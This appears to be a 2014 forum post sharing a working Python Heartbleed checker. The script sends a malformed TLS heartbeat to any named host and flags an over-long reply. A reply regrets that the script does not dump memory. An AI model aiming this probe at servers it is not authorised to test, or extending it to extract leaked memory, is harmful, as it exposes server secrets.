    04-13-2014 03:08 PM heartbleed.py
    #!/usr/bin/python2

    import sys
    import select
    import socket
    import struct

    # TCP port that main() connects to; fixed, there is no command-line override.
    port = 443

    # Record content types: compared against the first byte of the 5-byte
    # record header that recvheader() unpacks.
    TLS_ALERT        = 21
    TLS_HANDSHAKE    = 22
    TLS_HEARTBEAT    = 24
    # Handshake message types: compared against the first byte of a handshake
    # record's payload in main().
    TLS_SERVER_HELLO = 2
    TLS_SERVER_DONE  = 14

    # Pre-built ClientHello, sent verbatim by main(). The literal starts with
    # 16 0301 009a (handshake record, version bytes 03 01, 0x9a bytes of body)
    # and ends with 000f 0001 01, the heartbeat extension, which is what lets
    # the later heartbeat request be accepted at all.
    # NOTE(review): the 32-byte client random is baked into the literal, so
    # every run sends the exact same bytes; that makes the probe easy to
    # recognise in packet captures or IDS rules.
    hello = '160301009a0100009603015344d92abb92c20fbd4ea45804ec9772113085beaf355a0bd45cf30f6c563862000024c02bc02f009e009cc00ac01400390035c007c009c011c0130033003200050004002f000a0100000049000b000403000102000a00340032000e000d0019000b000c00180009000a00160017000800060007001400150004000500120013000100020003000f0010001100230000000f000101'.decode('hex')

    # Heartbeat record: 18 0301 0003 is the record header (type 24, version
    # bytes 03 01, 3-byte body); the body is 01 (request) followed by a
    # declared payload length of 0xf000 with no payload bytes behind it.
    # A server that bounds-checks the declared length has nothing valid to
    # echo; main() treats any heartbeat reply longer than 3 bytes as the
    # sign of a missing check.
    heartbeat = '180301000301f000'.decode('hex')

    def recvheader(s):
        """Read one 5-byte record header from socket *s*.

        Returns a 3-tuple unpacked with the big-endian layout '>BHH'
        (one unsigned byte followed by two unsigned 16-bit values); main()
        and recvrecord() use them as content type, version and body length.
        Returns (None, None, None) when recvall() could not deliver the
        five bytes.
        """
        raw = recvall(s, 5)
        if raw is None:
            return None, None, None
        content_type, version, body_length = struct.unpack('>BHH', raw)
        return content_type, version, body_length

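    def recvall(s, length):
        """Read exactly *length* bytes from socket *s*.

        Waits up to 5 seconds (via select) for each chunk. Returns the bytes
        read, or None if the wait times out or the peer closes the
        connection before *length* bytes have arrived. A *length* of 0
        returns an empty byte string without touching the socket.
        """
        chunks = []
        left = length
        while left > 0:
            ready = select.select([s], [], [], 5)
            if not ready[0]:
                # Nothing arrived within the timeout: give up on this read.
                return None
            res = s.recv(left)
            if not res:
                # An empty read means the peer closed the connection. Without
                # this check `left` never shrinks and select() keeps reporting
                # the socket as readable, so the loop would spin forever.
                return None
            chunks.append(res)
            left -= len(res)

        # b'' is a plain str on Python 2, so the return type is unchanged there.
        return b''.join(chunks)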

    def recvrecord(s):
        """Read one complete record (header plus body) from socket *s*.

        Returns (type, length, data), where *data* is the record body of
        *length* bytes; the version field of the header is read but not
        returned. Returns (None, None, None) if either the header or the
        body could not be read in full.
        """
        typ, _version, length = recvheader(s)
        if typ is not None:
            # The body length comes straight from the peer's header; it is a
            # 16-bit field, so a single read is capped at 65535 bytes.
            body = recvall(s, length)
            if body is not None:
                return typ, length, body
        return None, None, None


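    def _first_byte(data):
        """Return the first byte of *data* as an int, or None if *data* is empty."""
        return bytearray(data)[0] if data else None


    def main():
        """Check whether the host named in sys.argv[1] answers a malformed heartbeat.

        Connects to the host on the module-level `port`, sends the canned
        ClientHello, reads records until one starts with a ServerHelloDone
        message, then sends the canned heartbeat request and classifies the
        reply. Only the length of a heartbeat reply is inspected; its
        contents are neither printed nor stored.

        Reading the verdicts:
        - "Website is vulnerable" means a heartbeat reply longer than 3 bytes
          came back for a request that carried no payload.
        - The "not vulnerable" verdicts are not conclusive. A dropped packet,
          the 5-second read timeout, or a middlebox in the path all look the
          same as a server that ignored the request.
        - NOTE(review): the handshake loop only looks at the first byte of
          each record. A server that packs ServerHelloDone into the same
          record as an earlier handshake message would presumably never
          match, and the run would end with "Connection closed" and no
          verdict. Confirm against the servers you scan.
        """
        if len(sys.argv) <= 1:
            print("usage: python " + sys.argv[0] + " website")
            return
        host = sys.argv[1]

        print("Connecting to " + host)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host, port))

            print("Sending ClientHello")
            # sendall: send() may write only part of the buffer.
            s.sendall(hello)

            typ, length, data = recvrecord(s)
            if typ is None:
                print("No response to ClientHello")
                return

            # _first_byte() tolerates a zero-length record, where indexing
            # data[0] would raise IndexError.
            if not (typ == TLS_HANDSHAKE and _first_byte(data) == TLS_SERVER_HELLO):
                print("Didn't get server hello")
                return
            print("Got server hello")

            while True:
                typ, length, data = recvrecord(s)
                if typ is None:
                    print("Connection closed")
                    return
                print("%s %s" % (typ, length))

                if typ == TLS_HANDSHAKE and _first_byte(data) == TLS_SERVER_DONE:
                    print("Received server handshake done")
                    break

            print("Sending heartbeat")
            s.sendall(heartbeat)
            while True:
                typ, length, data = recvrecord(s)
                if typ is None:
                    print("No response to heartbeat, website not vulnerable")
                    break
                elif typ == TLS_ALERT:
                    print("Received TLS_ALERT, Website not vulnerable")
                    break
                elif typ == TLS_HEARTBEAT:
                    # The request body was 3 bytes with no payload, so any
                    # reply longer than that carries bytes the client never sent.
                    if len(data) > 3:
                        print("Website is vulnerable")
                    else:
                        print("Received heartbeat response, but not extra data. Website not vulnerable")
                    break
                # Any other record type is skipped and the loop keeps reading.
        finally:
            # Release the socket on every exit path, including early returns.
            s.close()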

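    # Run the check only when executed as a script, so that importing this
    # file (for example to reuse recvrecord) does not open a connection.
    if __name__ == '__main__':
        main()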



     
    04-13-2014 04:01 PM RE: heartbleed.py
    pretty neat. Kinda sad it doesnt go the full mile and start dumping mem contents. but nice job anyways.
    dmr, September 9, 1941 October 9, 2011

    Never Forget
     